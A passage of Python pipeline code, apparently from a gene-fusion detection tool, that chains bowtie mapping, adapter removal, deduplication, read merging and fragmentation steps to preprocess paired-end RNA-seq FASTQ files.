original one # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-v','1',kind='parameter') # options.mismatches # job.add('-X','800',kind='parameter') job.add('-X','10000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',tz,kind='output',checksum='no') # unmapped reads job.add('--un',t1z,kind='output',command_line='no') # unmapped reads job.add('--un',t2z,kind='output',command_line='no') # unmapped reads job.add('--max',outdir('sf%d_multiple.fq' % (i)),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input',temp_path=temp_flag) job.add('-2',r,kind='input',temp_path=temp_flag) job.add('',outdir('ox.map'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() info(job, fromfile = fastlen, tofile = info_file, top = ["Longest read (fast computation)", "--------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # save lengths reads info(job, fromfile = outdir('log_fast-filtering.stdout.txt'), tofile = info_file, top = ["Fast pre-filtering:", "------------------------"], bottom = "\n\n\n", temp_path=temp_flag) job.link(t1z, f2, temp_path=temp_flag) job.link(t2z, r2, temp_path=temp_flag) f = f2 r = r2 else: pass job.add(_FC_+'overlap.py',kind='program') job.add('--input_1',f,kind='input') job.add('--input_2',r,kind='input') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--fail-gracefully',kind='parameter',checksum='no') job.add('--output',outdir('log_overlaps__%d.txt' % (i,)),kind='output') job.add('2>',outdir('log_overlaps_error__%d.txt' % (i,)),kind='parameter',checksum='no') job.run() sizes = False if os.path.exists(outdir('log_overlaps_error__%d.txt' % (i,))): # find out if it failed because of the different reads sizes sizes = True if [1 for line in file(outdir('log_overlaps_error__%d.txt' % (i,)),'r').readlines() if line.lower().find('different lengths') != -1] else False if job.iff(sizes, id = "#different_sizes_of_reads_overlap_%d#" % (i,)): # input FASTQ files contain reads of different sizes therefore they are paded so end up being the same size job.clean(outdir('log_overlaps_error__%d.txt' % (i,)),temp_path=temp_flag) job.clean(outdir('log_overlaps__%d.txt' % (i,)),temp_path=temp_flag) if options.skip_fastqtk: job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',f,kind='input') job.add('--output',outdir('log_lengths_original_reads_f_%d.txt' % (i,)),kind='output') job.run() job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',r,kind='input') job.add('--output',outdir('log_lengths_original_reads_r_%d.txt' % (i,)),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',f,kind='input') job.add('',outdir('log_lengths_original_reads_f_%d.txt' % (i,)),kind='output') job.run() job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',r,kind='input') job.add('',outdir('log_lengths_original_reads_r_%d.txt' % (i,)),kind='output') job.run() #job.add('cat',kind='program') #job.add('',outdir('log_lengths_original_reads_f_%d.txt' % (i,)),kind='input',temp_path=temp_flag) #job.add('',outdir('log_lengths_original_reads_r_%d.txt' % (i,)),kind='input',temp_path=temp_flag) #job.add('|',kind='parameter') #job.add('LC_ALL=C',kind='parameter') #job.add('sort',kind='parameter') #if sort_buffer: # job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') #if sort_parallel: # job.add('--parallel',options.processes,kind='parameter',checksum='no') #if sort_lzop_compress: # job.add('--compress-program','lzop',kind='parameter',checksum='no') #elif sort_gzip_compress: # job.add('--compress-program','gzip',kind='parameter',checksum='no') #job.add('-T',tmp_dir,kind='parameter',checksum='no') #job.add('-nr',kind='parameter') #job.add('|',kind='parameter') #job.add('uniq',kind='parameter') #job.add('>',outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),kind='output') #job.run() x = outdir('log_lengths_original_reads_f_%d.txt' % (i,)) y = outdir('log_lengths_original_reads_r_%d.txt' % (i,)) if job.run(): n1 = 0 if os.path.isfile(x): n1 = int(float(file(x,'r').readline().strip())) n2 = 0 if os.path.isfile(y): n2 = int(float(file(y,'r').readline().strip())) file(outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),'w').write(str(min(n1,n2))) job.clean(x,temp_path=temp_flag) job.clean(y,temp_path=temp_flag) ff = f[:] rr = r[:] f = outdir(os.path.basename(f).replace('init-','init-f-')) r = outdir(os.path.basename(r).replace('init-','init-r-')) # add A to the reads which are shorter in order to make all reads have the same length job.add(_FC_+'padding-fastq.py',kind='program') job.add('--input',ff,kind='input',temp_path=temp_flag) job.add('--output',f,kind='output') job.add('--size',outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),kind='parameter',from_file='yes') job.run() job.add(_FC_+'padding-fastq.py',kind='program') job.add('--input',rr,kind='input',temp_path=temp_flag) job.add('--output',r,kind='output') job.add('--size',outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),kind='parameter',from_file='yes') job.run() job.clean(outdir('log_lengths_original_reads_fr_%d.txt' % (i,)),temp_path=temp_flag) job.add(_FC_+'overlap.py',kind='program') job.add('--input_1',f,kind='input') job.add('--input_2',r,kind='input') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--output',outdir('log_overlaps_fr_%d.txt' % (i,)),kind='output') job.run() info(job, fromfile = outdir('log_overlaps_fr_%d.txt' % (i,)), tofile = info_file, top = ["","","", "Pair-reads overlappings (after padding):", "----------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) else: info(job, fromfile = outdir('log_overlaps__%d.txt' % (i,)), tofile = info_file, top = ["","","", "Pair-reads overlappings:", "------------------------"], bottom = "\n\n\n", temp_path=temp_flag) job.clean(outdir('log_overlaps_error__%d.txt' % (i,)),temp_path=temp_flag) if (not options.skip_adapter_filtering): job.add(_FC_+'remove-adapter.py',kind='program') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--input_1',f,kind='input',temp_path=temp_flag) job.add('--input_2',r,kind='input',temp_path=temp_flag) job.add('--output_1',output_1_file,kind='output') job.add('--output_2',output_2_file,kind='output') job.add('--trim-n',options.mismatches+1,kind='parameter') job.add('--link','hard',kind='parameter',checksum='no') job.add('>',outdir('log_adapters_%d.txt' % (i,)),kind='parameter',checksum='no') job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_adapters_%d.txt' % (i,)), tofile = info_file, top = ["", "Adapters information:", "--------------------"], bottom = "\n\n\n", temp_path = temp_flag) else: job.link(f,output_1_file,temp_path=temp_flag) job.link(r,output_2_file,temp_path=temp_flag) in1 = output_1_file in2 = output_2_file ou3 = outdir(os.path.basename(in1).replace('init-','init-clear-')) ou4 = outdir(os.path.basename(in2).replace('init-','init-clear-')) # remove the reads marked as bad by Illumina job.add(_FC_+'remove-bad-illumina.py',kind='program') job.add('--input',in1,kind='input',temp_path=temp_flag) job.add('--output',ou3,kind='output') job.add('--link','hard',kind='parameter',checksum='no') job.add('2>',outdir('log_bad_illumina_1_%d.txt' % (i,)),kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bad_illumina_1_%d.txt' % (i,)), tofile = info_file, top = ["Reads (mate 1 from pair) removed because being marked as bad by Illumina:", "-------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # job.add('printf',kind='program') # job.add(('"\nReads (mate 1 reads) removed because being marked as bad by Illumina:\n'+ # '---------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bad_illumina_1.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() job.add(_FC_+'remove-bad-illumina.py',kind='program') job.add('--input',in2,kind='input',temp_path=temp_flag) job.add('--output',ou4,kind='output') job.add('--link','hard',kind='parameter',checksum='no') job.add('2>',outdir('log_bad_illumina_2_%d.txt' % (i,)),kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bad_illumina_2_%d.txt' % (i,)), tofile = info_file, top = ["Reads (mate 2 from pair) removed because being marked as bad by Illumina:", "-------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # job.add('printf',kind='program') # job.add(('"Reads (read 2 from pair) removed because being marked as bad by Illumina:\n'+ # '----------------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bad_illumina_2.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # add /1 and /2 in the end of the reads ids in1 = ou3 in2 = ou4 ou3 = outdir(os.path.basename(in1).replace('init-','init-sra-')) ou4 = outdir(os.path.basename(in2).replace('init-','init-sra-')) job.add(_FC_+'sra2illumina.py',kind='program') #job.add('--tag_read_name','Z'+str(i)+'Z',kind='parameter') job.add('--input_1',in1,kind='input',temp_path=temp_flag) job.add('--input_2',in2,kind='input',temp_path=temp_flag) job.add('--output_1',ou3,kind='output') job.add('--output_2',ou4,kind='output') job.add('--link','hard',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() in1 = ou3 in2 = ou4 output_file = outdir(os.path.basename(in1).replace('init-','init-shuffle-').replace("_1.",".").replace("_2.",".")) # job.add('shuffle.py',kind='program') # job.add('--input_1',in1,kind='input',temp_path=temp_flag) # job.add('--input_2',in2,kind='input',temp_path=temp_flag) # job.add('--output',output_file,kind='output') # job.run() # job.add('awk',kind='program') # job.add("""'{print; getline; print; getline; print; getline; print; getline < "%s"; print; getline < "%s"; print; getline < "%s"; print; getline < "%s"; print}' '%s'""" % (in2,in2,in2,in2,in1),kind='parameter') # job.add('',in1,kind='input',temp_path=temp_flag,command_line='no') # job.add('',in2,kind='input',temp_path=temp_flag,command_line='no') # job.add('>',output_file,kind='output') # job.run() #awk '{print; getline; print; getline; print; getline; print; getline < "2.txt"; print; getline < "2.txt"; print; getline < "2.txt"; print; getline < "2.txt"; print}' 1.txt if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',in1,kind='input',temp_path=temp_flag) job.add('',in2,kind='input',temp_path=temp_flag) job.add('>',output_file,kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',in1,kind='input',temp_path=temp_flag) job.add('',in2,kind='input',temp_path=temp_flag) job.add('',output_file,kind='output') job.run() shuffled = True new_list_input_files.append(output_file) job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # last file in case that the number of input files is odd if len(list_input_files) % 2 == 1: f = list_input_files[-1] output_file = outdir(os.path.basename(f).replace('init-','init-single-')) job.link(f,output_file,temp_path=temp_flag) new_list_input_files.append(output_file) job.add('printf',kind='program') job.add('"\nTotal Count of reads (from all FASTQ files given as input and before any read removal is done, i.e. quality filtering, pre-processing):\n--------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() list_input_files = new_list_input_files[:] new_list_input_files = [] for i,input_file in enumerate(list_input_files): job.add('printf',kind='program') job.add('"%s = "' % (input_file,),kind='parameter') job.add('>>',info_file,kind='output') job.run() if options.skip_fastqtk: job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',input_file,kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('count',kind='parameter') job.add('',input_file,kind='input') job.add('-',kind='parameter') job.add('>>',info_file,kind='output') job.run() # convert the read names to Illumina Solexa version 1.5 format (i.e. end in /1 or /2) output_file = outdir(os.path.basename(input_file).replace('init-','init-head-')) job.add(_FC_+'solexa18to15.py',kind='program') job.add('--fail',kind='parameter') job.add('--input',input_file,kind='input',temp_path=temp_flag) job.add('--output',output_file,kind='output') job.add('--link','hard',kind='parameter') job.run() # convert the quality scores to Illumina Solexa version 1.5 format infile = output_file output_file = outdir(os.path.basename(infile).replace('init-','init-phred-')) job.add(_FC_+'phred.py',kind='program') job.add('--link','hard',kind='parameter') job.add('--input',infile,kind='input',temp_path=temp_flag) job.add('--output',output_file,kind='output') job.add('--input_type','auto-detect',kind='parameter') #job.add('--output_type','illumina-1.5',kind='parameter') job.add('--output_type','sanger',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() new_list_input_files.append(output_file) job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() output_file = outdir('orig__.fq') # concatenate reads before trimming if len(list_input_files) > 1: #job.add('concatenate.py',kind='program') job.add('cat',kind='program') job.add_list('',new_list_input_files,kind='input',temp_path=temp_flag) if options.trimfq < 1: job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-q',options.trimfq,kind='parameter') job.add('-',kind='parameter') job.add('>',output_file,kind='output') job.run() else: job.link(new_list_input_files[0], output_file, temp_path=temp_flag) if not options.skip_trim_multiple_5: #bbduk.sh in=reads.fq out=clean.fq ftm=5 job.add(_BP_+'bbduk.sh',kind='program') job.add('forcetrimmod=','5',kind='parameter',space='no') job.add('in=',outdir('orig__.fq'),kind='input',space='no', temp_path=temp_flag) job.add('out=',outdir('orig__x.fq'),kind='output',space='no') job.run() else: job.link(outdir('orig__.fq'), outdir('orig__x.fq'), temp_path=temp_flag) if not options.skip_filter_low_entropy: #bbduk.sh in=r.fq out=o.fq entropy=0.1 entropymask=t entropyk=2 entropywindow=40 job.add(_BP_+'bbduk.sh',kind='program') job.add('entropy=','0.1',kind='parameter',space='no') job.add('entropymask=','t',kind='parameter',space='no') job.add('entropyk=','2',kind='parameter',space='no') job.add('entropywindow=','40',kind='parameter',space='no') job.add('in=',outdir('orig__x.fq'),kind='input',space='no', temp_path=temp_flag) job.add('out=',outdir('orig.fq'),kind='output',space='no') job.run() else: job.link(outdir('orig__x.fq'), outdir('orig.fq'), temp_path=temp_flag) if not options.skip_deduplication: job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('orig.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('paste','- - - - - - - -',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add(_FC_+'pair8removal.py',kind='parameter') job.add('-l','30',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','2,2',kind='parameter') job.add('-k','6,6',kind='parameter') job.add('-u',kind='parameter') # unique job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') job.add('-k','2,2',kind='parameter') job.add('-k','6,6',kind='parameter') job.add('-u',kind='parameter') # unique job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('>',outdir('origi.fq'),kind='output') job.run() else: job.link(outdir('orig.fq'), outdir('origi.fq'), temp_path=temp_flag) if options.prefilter == "3": # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-1',outdir('origi.fq'),kind='input') # job.add('>',outdir('ox1.fq'),kind='output') # job.run() # # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-2',outdir('origi.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('ox2.fq'),kind='output') # job.run() if options.skip_fastqtk: job.add(_FC_+'unshuffle.py',kind='program') job.add('-i',outdir('origi.fq'),kind='input',temp_path=temp_flag) job.add('-f',outdir('ox1.fq'),kind='output') job.add('-r',outdir('ox2.fq'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('deinterleave',kind='parameter') job.add('',outdir('origi.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox1.fq'),kind='output') job.add('',outdir('ox2.fq'),kind='output') job.run() use_seed = True if use_seed: # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',outdir('ox.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('ox_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('ox_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('oxx_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',outdir('ox1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('ox2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox.map'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() else: # this was the original one # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-v','1',kind='parameter') # options.mismatches # job.add('-X','800',kind='parameter') job.add('-X','10000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',outdir('ox.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('ox_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('ox_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('ox_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',outdir('ox1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('ox2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox.map'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() # save lengths reads info(job, fromfile = outdir('log_fast-filtering.stdout.txt'), tofile = info_file, top = ["Fast pre-filtering:", "-------------------"], bottom = "\n\n\n", temp_path=temp_flag) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('ox_1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox_2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('origin.fq'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('ox_1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox_2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('origin.fq'),kind='output') job.run() else: job.link(outdir('origi.fq'), outdir('origin.fq'), temp_path=temp_flag) if options.skip_fastqtk: # compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('origin.fq'),kind='input') job.add('--output',outdir('log_lengths_original_reads.txt'),kind='output') job.add('--counts',outdir('log_counts_original_reads.txt'),kind='output') job.run() ##cat snu16/reads_acgt.fq | awk '{if(NR%4==2) print length($1)}' | sort -n | uniq else: job.add(_FK_+'fastqtk',kind='program') job.add('count-lengths',kind='parameter') job.add('',outdir('origin.fq'),kind='input') job.add('',outdir('log_counts_original_reads.txt'),kind='output') job.add('',outdir('log_lengths_original_reads.txt'),kind='output') job.run() max_len_reads = 0 if os.path.exists(outdir('log_lengths_original_reads.txt')): max_len_reads = int(float(file(outdir('log_lengths_original_reads.txt'),'r').readline().rstrip())) if not options.bridges: options.bridges = int(math.ceil(float(max_len_reads)/float(160))) # save lengths reads info(job, fromfile = outdir('log_lengths_original_reads.txt'), tofile = info_file, top = ["Length of all original reads:", "-----------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add('"\nLength of Original Reads:\n-----------------\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_lengths_original_reads.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if shuffled and (not options.skip_compress_ids): if options.skip_fastqtk: # lossy compression of the reads ids job.add(_FC_+'compress-reads-ids.py',kind='program') job.add('--input',outdir('origin.fq'),kind='input',temp_path=temp_flag) job.add('--output',outdir('original.fq'),kind='output') job.add('--count-reads',outdir('log_counts_original_reads.txt'),kind='input') job.add('--lowercase',kind='parameter') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('compress-id',kind='parameter') job.add('/12',kind='parameter') job.add('',outdir('log_counts_original_reads.txt'),kind='input') job.add('',outdir('origin.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('original.fq'),kind='output') job.run() else: job.link(outdir('origin.fq'), outdir('original.fq'), temp_path=temp_flag) info(job, fromfile = outdir('log_counts_original_reads.txt'), tofile = info_file, top = ["------------------------------------------------------------------------------------------------------", "Total counts of all input/original reads (reads marked by Illumina as bad are not included here):", "------------------------------------------------------------------------------------------------------"], bottom = "\n------------------------------------------------------------------------------------------------------\n\n", temp_path = temp_flag) # job.add('printf',kind='program') # job.add(('"\nTotal Reads Counts (after the reads marked by Illumina as bad have been removed):\n'+ # '---------------------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_counts_original_reads.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if options.sonication > 80 and options.trim_psl_3end_keep < options.sonication and options.sonication <= max_len_reads: job.add('printf',kind='program') job.add('"\n\nInput reads are broken up bioinformatically in smaller pieces due detection of very long reads!\n----------------------\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # job.add(_SK_+'seqtk',kind='program') # job.add('trimfq',kind='parameter') # job.add('-q','0.25',kind='parameter') # job.add('',outdir('original.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('original-temp.fq'),kind='output') # job.run() # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-1',outdir('original.fq'),kind='input') # job.add('>',outdir('or1.fq'),kind='output') # job.run() # # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-2',outdir('original.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('or2.fq'),kind='output') # job.run() # job.add(_FC_+'overlap.py',kind='program') # job.add('--input_1',outdir('or1.fq'),kind='input') # job.add('--input_2',outdir('or2.fq'),kind='input') # job.add('--processes',options.processes,kind='parameter',checksum='no') # job.add('--merged',kind='parameter') # job.add('--alignment',outdir('merged.txt'),kind='output') # job.add('--output',outdir('log_overlaps_fragments.txt'),kind='output') # job.run() if options.skip_bbmerge: job.add(_FC_+'merge-reads.py',kind='program') job.add('-1',outdir('original.fq'),kind='input',temp_path=temp_flag) job.add('-m',outdir('merged.fq'),kind='output') job.add('-f',outdir('or1.fq'),kind='output') job.add('-r',outdir('or2.fq'),kind='output') job.add('--overlap','13',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.run() else: #bbmerge.sh in=reads.fq out=merged.fq outu=unmerged.fq ihist=ihist.txt job.add(_BP_+'bbmerge.sh',kind='program') job.add('in=',outdir('original.fq'),kind='input',space='no') job.add('out=',outdir('merged.fq'),kind='output',space='no') job.add('outu=',outdir('unmerged.fq'),kind='output',space='no') job.add('threads=',options.processes,kind='parameter',space='no',checksum='no') job.add('strict=','f',kind='parameter',space='no') job.add('minoverlap=','13',kind='parameter',space='no') job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no') job.run() if options.skip_fastqtk: job.add(_FC_+'unshuffle.py',kind='program') job.add('-i',outdir('unmerged.fq'),kind='input',temp_path=temp_flag) job.add('-f',outdir('or1.fq'),kind='output') job.add('-r',outdir('or2.fq'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('deinterleave',kind='parameter') job.add('',outdir('unmerged.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('or1.fq'),kind='output') job.add('',outdir('or2.fq'),kind='output') job.run() job.add(_FC_+'fragment_fastq.py',kind='program') job.add('-1',outdir('or1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('or2.fq'),kind='input',temp_path=temp_flag) job.add('-f',outdir('originala-t1.fq'),kind='output') # job.add('-m',outdir('merged.txt'),kind='input',temp_path=temp_flag) job.add('--window-size',options.trim_psl_3end_keep,kind='parameter') job.add('--step-size',options.trim_psl_3end_keep-2*length_anchor_minimum+1,kind='parameter') job.add('--threshold-read',options.trim_psl_3end_keep + 10,kind='parameter') job.add('--anchors',options.bridges,kind='parameter') job.add('--skip-short',options.trim_3end_keep,kind='parameter') job.add('--trim-n',kind='parameter') job.run() job.add(_FC_+'fragment_fastq.py',kind='program') job.add('-1',outdir('merged.fq'),kind='input',temp_path=temp_flag) job.add('-2','-',kind='parameter') job.add('-f',outdir('originala-t2.fq'),kind='output') job.add('--window-size',options.trim_psl_3end_keep,kind='parameter') job.add('--step-size',options.trim_psl_3end_keep-2*length_anchor_minimum+1,kind='parameter') job.add('--threshold-read',options.trim_psl_3end_keep + 10,kind='parameter') job.add('--anchors',options.bridges,kind='parameter') job.add('--skip-short',options.trim_3end_keep,kind='parameter') job.add('--trim-n',kind='parameter') job.run() job.add('cat',kind='program') job.add('',outdir('originala-t1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('originala-t2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('originala.fq'),kind='output') job.run() fragments_flag = True # job.add('cat',kind='program') # job.add('',outdir('or1.fq'),kind='input',temp_path=temp_flag) # job.add('',outdir('or2.fq'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # if pigz: # job.add('pigz',kind='parameter') # job.add('-p',options.processes,kind='parameter',checksum='no') # else: # job.add('gzip',kind='parameter') # job.add('--fast',kind='parameter') # job.add('>',outdir('or.fq.gz'),kind='output') # job.run() # job.add('seqtk',kind='program') # job.add('mergepe',kind='parameter') # job.add('',outdir('soni1.fq'),kind='input',temp_path=temp_flag) # job.add('',outdir('soni2.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('originala.fq'),kind='output') # job.run() if options.skip_fastqtk: # compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('originala.fq'),kind='input') job.add('--output',outdir('log_lengths_original_reads_final.txt'),kind='output') job.add('--counts',outdir('log_counts_original_reads_final.txt'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('count-lengths',kind='parameter') job.add('',outdir('originala.fq'),kind='input') job.add('',outdir('log_counts_original_reads_final.txt'),kind='output') job.add('',outdir('log_lengths_original_reads_final.txt'),kind='output') job.run() max_len_reads = 0 if os.path.exists(outdir('log_lengths_original_reads_final.txt')): max_len_reads = int(float(file(outdir('log_lengths_original_reads_final.txt'),'r').readline().rstrip())) info(job, fromfile = outdir('log_counts_original_reads_final.txt'), tofile = info_file, top = ["Total counts of all input reads (after breaking up them bioinformatically):", "-------------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # save lengths reads info(job, fromfile = outdir('log_lengths_original_reads_final.txt'), tofile = info_file, top = ["Length of all input reads (after breaking up them bioinformatically):", "---------------------------------------------------------------------"], bottom = "\n\n\n") else: job.link(outdir('original.fq'), outdir('originala.fq'), temp_path=temp_flag) input_file = outdir('originala.fq') output_file = outdir('original-t5-t3.fq') if options.trim_5end > 0 or options.trim_3end > 0: # trim 5 # job.add('trim_reads.py',kind='program') # job.add('--input',input_file,kind='input', temp_path='no') # job.add('--output',output_file,kind='output') # 